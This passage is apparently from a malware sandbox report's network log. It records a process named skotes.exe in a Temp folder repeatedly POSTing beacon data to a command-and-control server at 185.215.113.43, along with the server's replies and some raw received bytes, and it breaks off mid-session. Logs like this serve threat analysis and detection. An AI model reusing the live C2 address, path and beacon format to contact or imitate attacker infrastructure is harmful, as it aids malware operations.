Dec 31, 2024 09:48:40.472559929 CET	1236	IN	Data Raw: 8f 1d f6 e7 36 25 35 a3 80 4c c1 cf 49 61 b2 e7 96 66 e2 25 7c ce f4 c5 7e e6 48 17 5e a2 f0 4f ef 1d f6 e7 36 25 35 a3 80 4c fd cf 45 6e b2 e7 96 56 ef 25 7c ce d4 fb 7e e6 48 f7 50 a2 f0 4f cf 1d f6 e7 36 25 35 a3 80 4c fd cf 6d 6e b2 e7 96 f2 Data Ascii: 6%5LIaf%\|~H^O6%5LEnV%\|~HPO6%5Lmn%\|4~HPO/6%5Lun%\|~H_O6%5L1n%\|t~HYOo6%5L%nz%\|T~HwXOO6%5LnZ%\|~HWXO6%5LUn
Dec 31, 2024 09:48:40.472569942 CET	1236	IN	Data Raw: 7c ce b4 c0 7e e6 48 57 4c a2 f0 4f af 10 f6 e7 36 25 35 a3 80 4c ed cf d5 6a b2 e7 96 02 8a 25 7c ce 94 c0 7e e6 48 37 4d a2 f0 4f 8f 10 f6 e7 36 25 35 a3 80 4c fd cf 8d 6a b2 e7 96 2a 8e 25 7c ce f4 c0 7e e6 48 17 4d a2 f0 4f ef 10 f6 e7 36 25 Data Ascii: \|~HWLO6%5Lj%\|~H7MO6%5Lj%\|~HMO6%5Lj%\|~HOO6%5Lj%\|4~HOO/6%5L]jj%\|~HNO6%5NR885NAR885N!R885LMj%\|
Dec 31, 2024 09:48:40.472580910 CET	1236	IN	Data Raw: 80 b3 6b 43 26 d9 49 ff c6 a2 f0 fb 9e e6 f0 e7 7d b6 11 eb 1d a0 f0 92 ba b6 75 24 48 42 10 e7 7d e6 f0 6c 39 ee 3f 24 50 e6 f0 e7 7d b6 c8 fa ee e7 f0 a3 80 2a 35 a3 80 2a 35 a3 80 2a 35 a3 80 b3 6b 43 ff ca f5 6c 01 d2 c9 90 54 d9 24 cf 79 e6 Data Ascii: kC&I}u$HB}l9?$P}555kClT$y,7N}5kCm&,&j%x?bO"zR$\|m?=1$555kCm&,&j%x?bO"z$\|m?=1$555bhP!!jm
Dec 31, 2024 09:48:40.477416992 CET	1236	IN	Data Raw: 70 b0 11 eb 1d a0 f0 92 ba b6 75 24 48 42 10 e7 7d e6 f0 6a 4d 6f a2 57 26 e6 48 ca fe a3 f0 6c 01 3e 6e d4 4d 21 b2 4f 7c e6 f0 e7 bc a3 d4 ed 7d e6 f0 a5 39 3e f1 4f cd b1 f1 e7 c2 a3 38 a6 39 da f1 e7 7d e6 80 5e c9 ea 6b ad 53 53 e9 4f 05 db Data Ascii: pu$HB}jMoW&Hl>nM!O\|}9>O89}^kSSO$^aV8!'vY\|k(Pe3'pPe0)}e=x:k,}=D>55kC*mD06j&x?7-}!czbk%@oh;kx:=1$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49914	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:04.798247099 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 31, 2024 09:49:05.504883051 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49930	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:07.028126001 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 31, 2024 09:49:07.742714882 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49946	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:09.371814966 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 31, 2024 09:49:10.169357061 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49963	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:11.684186935 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 31, 2024 09:49:12.388041019 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49979	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:14.030733109 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 31, 2024 09:49:14.730952978 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49993	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:16.247111082 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 31, 2024 09:49:16.942919016 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	50000	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:18.577122927 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 31, 2024 09:49:19.278074980 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	50002	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:20.793517113 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 31, 2024 09:49:23.637319088 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	50003	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:25.262285948 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 31, 2024 09:49:26.093508005 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	50004	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:27.644278049 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 31, 2024 09:49:28.349101067 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	50005	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:29.999681950 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 31, 2024 09:49:30.732076883 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	50006	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:32.248677015 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 31, 2024 09:49:32.953929901 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	50008	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:34.591372967 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 31, 2024 09:49:35.300867081 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	50009	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:36.809385061 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 31, 2024 09:49:37.515782118 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	50010	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:39.417922020 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 31, 2024 09:49:40.111429930 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	50011	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:41.621727943 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 31, 2024 09:49:43.812731981 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	50012	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:45.452210903 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 31, 2024 09:49:46.158930063 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	50013	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:47.668617964 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 31, 2024 09:49:48.382879972 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	50014	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:50.012197971 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 31, 2024 09:49:50.720453978 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	50015	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:52.329287052 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 31, 2024 09:49:53.044357061 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	50016	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:49:54.678767920 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 31, 2024 09:49:55.376422882 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:49:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	50017	185.215.113.43	80	4148	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
